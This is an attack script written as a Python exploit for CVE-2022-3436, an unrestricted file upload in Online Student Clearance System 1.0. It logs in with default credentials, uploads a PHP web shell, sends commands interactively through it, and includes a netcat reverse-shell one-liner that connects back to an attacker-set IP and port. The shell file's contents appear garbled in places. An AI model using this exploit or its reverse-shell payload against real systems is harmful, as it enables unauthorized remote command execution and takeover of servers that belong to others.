#!/usr/bin/python3 # Exploit Title: Online Student Clearance System - Unrestricted File Upload to RCE (Authenticated) # Date: 28/11/2023 # Exploit Author: Akash Pandey aka l3v1ath0n # Version: <= 1.0 # Tested on: Kali Linux # CVE : CVE-2022-3436 import requests import time import os print(""" ____ ___ ____ ____ _____ _ _ _____ __ _____ _____ |___ \ / _ \___ \|___ \ |___ /| || ||___ / / /_ / __\ \ / / _ \_____ __) | | | |__) | __) |____ |_ \| || |_ |_ \| '_ \ | (__ \ V / __/_____/ __/| |_| / __/ / __/_____|__) |__ _|__) | (_) | \___| \_/ \___| |_____|\___/_____|_____| |____/ |_||____/ \___/ Exploit: By Akash Pandey aka l3v1ath0n, developed with ❤️: Twitter: https://twitter.com/_l3v1ath0n Github: https://www.github.com/1337-L3V1ATH0N/Exploit_Development/ """) web_url = "" # Edit this as per your need username = "18/132010" # Default Username password = "11111111" # Default Password local_ip = "" # Edit this IP to your local Ip for reverse shell local_port = "1337" # Port of local machine to connect reverse shell on... rev_shell = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc " + local_ip + " " + local_port + " >/tmp/f" # Firing request to login log_url = web_url+"login.php" #Telling script to use previous session session = requests.Session() #Post Body Data for login post_data = {'txtmatric_no':username,'txtpassword':password, 'btnlogin':''} #Sending request to web server with required post data response = session.post(log_url,data=post_data) # Checking Login if Successful: time.sleep(1) # Creating a shell file in current directory print("[i] Creating a shell file to upload.") with open("shell.php","w") as file: file.write("&1'); ?>") file.close() time.sleep(1) print("[i] Checking Login.") if response.history: print("[+] Login Successful.") time.sleep(1) print("[i] Uploading Shell.") # Step 1: Reads the shell.php file in current folder # Step 2: Stores the content in filename called shell.php # Step 3: Uses the variable name userImage to upload file to server. file = {'userImage':('shell.php',open("shell.php","rb"))} # Sending payload as POST data to shell.php file payload = {'userImage':"&1'); ?>",'btnedit':''} # Uploading the malicious php file at below path using files and data values upload_response = session.post(web_url+"edit-photo.php",files=file,data=payload) print ("[TIP] Run netcat to catch reverse-shell on nc. Edit IP and Port in script") while True: command = input("l3v1ath0n㉿CVE-2022-3436: ") if command == "exit": break elif command == "netcat": print("[!] Don't forget to start Netcat Listener") time.sleep(3) payload = {'cmd':rev_shell} cmd = session.get(web_url+"uploads/shell.php?",params=payload) print(cmd.text) else: payload = {'cmd':command} cmd = session.get(web_url+"uploads/shell.php?",params=payload) print(cmd.text) print("\n[i] Closing this Session") session.close() else: print("[-] Login Failed.")